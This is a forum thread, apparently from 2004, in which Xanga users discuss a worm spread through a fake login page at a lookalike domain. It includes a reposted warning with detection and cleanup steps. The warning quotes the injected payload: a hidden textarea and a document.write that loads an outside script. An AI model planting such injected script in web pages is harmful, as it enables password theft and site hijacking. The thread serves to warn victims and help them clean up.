hacker? Options

[XxArsonFreakxX]

well is there anyway that we can shut donw whatever site they are hosting this virus from

[coyote]

it's no use...
the buttwipe can just make more hosts....

[artislife90]

Xanga needs to form a defense against stuff like this. Just shutting down one host will do no good.

[coyote]

I don't know what xanga is doing right now but prevent this is too easy. What the hell are the staff doing?

[XxArsonFreakxX]

thanx guys for all the help i fixed all of my friends sites and does anyone know if that script that someone posted up earlier works??

[coyote]

no it doesn't...

To those who got infected.
Was everything in the claf removed?

[XxArsonFreakxX]

ok thanx for the answer about the script

[yoyorks]

no it doesn't...

To those who got infected.
Was everything in the claf removed?

nothing in my CLAF was deleted

[Artsy_Toni]

no it doesn't...

To those who got infected.
Was everything in the claf removed?

Nope. All my stuff is still there.

[XxArsonFreakxX]

ok i didnt get infected byt his whole virus thing so i was wondering if anyone who got infected with this noticed anyhing else wrong with their xanga??

[coyote]

well if it's still there, then the code would work.

[yoyorks]

i didn't c anything change

[yoyorks]

anyone else need help with the problem?

[sherryvu]

please do not double post, there's an "edit" link at the top-right of each post thank you

[flipinesebebe]

Hey, I was wondering if you can do anything about the subs page problem? Everything else is fixed otherwise on my page. Thanks!!

[largosama]

the window popup infection/spread part at least doesn't work... or is it just my computer

[hoogli]

no, i think it's because the hacker's webiste was shut down.

[bffelon]

so yall like dk's virus eh?

he did alot more than yall know, and trust me, its still spreading...just not only over xanga now

and no, the page is down currently because so many stupid ppl checked the screwed up pages it overloaded the bw on the server he used

im even in the shouts

[coyote]

so yall like dk's virus eh?

he did alot more than yall know, and trust me, its still spreading...just not only over xanga now

and no, the page is down currently because so many stupid ppl checked the screwed up pages it overloaded the bw on the server he used

im even in the shouts

congratulations, you must be proud of yourself.

[bffelon]

oh dont be mad, yall were stupid enough to spread it

[yoyorks]

i'm happy i didn't infect any of my friends.....if you have X-tracker,
you can tell if any of your friends have gotten your virus...

[mirage]

oh dont be mad, yall were stupid enough to spread it

haha, another no live who just make a new account to talk trash...
i think xanga fixed it, i don't think there are any more virus... for now =D

[bffelon]

actually, ive been signed up here for a while, ive just seen no reason to post. also, whats a "no live" you mean "low life" cmon, english here, english

[misskay]

by the way there was something happening like this awhile ago i had a warning on my xanga, just in case it's not fixed.....

Friday, October 22, 2004
HEY EVERYBODY! When you sign in, please be careful that you sign in to www.xanga.com, instead of xagna.tk. That's the location of a current Xanga virus. In fact, if you go there now, you will see a login screen. They WILL steal your password and modify your site.

HOW THE VIRUS WORKS: If your site is infected, it replaces all of your links with links to xagna.tk. When someone tries to add a comment, it redirects them to the page. It looks exactly like the normal login page, so they submit their username and password. With the username and password, xagna.tk logs into their site and adds the malicious code to the bottom of Website Stats.

TO SEE IF YOU'RE INFECTED: Go to your Look & Feel page. Go to Website Stats, scroll down to the bottom, and see if there are a bunch of blank lines followed by something that looks like a flooble chatterbox with id=bob. If you see it, DELETE IT and CHANGE YOUR PASSWORD.

OK, announcement done.

PS. Also check your custom header, they are targeting there too

The fake code looks like this.....

<textarea id=mtarea1 style='display:none'>
<script id=bob
src="http://chatter.flooble.com/chatter.php">
</script>
</textarea>
<script>
document.write(document.getElementById("mtarea1").value.replace("http://chatter.flooble.com/chatter.php","http:///test.php"));
</script>





(please post this on your site too, so everyone knows to check out there xanga's)

I do NOT take credit for this anouncement, i first saw it on http://www.createblog.com



Be careful, and before you type in your username and password, check the site address

[kill me please]

the exe file is an activeX program...

we need to know the source...
In order for this fuckhead to infect us... he has to create a xanga and go to a site like createblog and post "CHECK OUT MY XANGA"

To disable javascript in IE:
Click Tools -> Internet Options -> Security -> Custom Level

under "Scripting", disable Active Scripting.
I guess after all this is over, you can enable it again.

i havent got the virus and i dont want it. so would anyone like to post the way to disable the javascript in things other than IE.. like AOL, and Mozilla?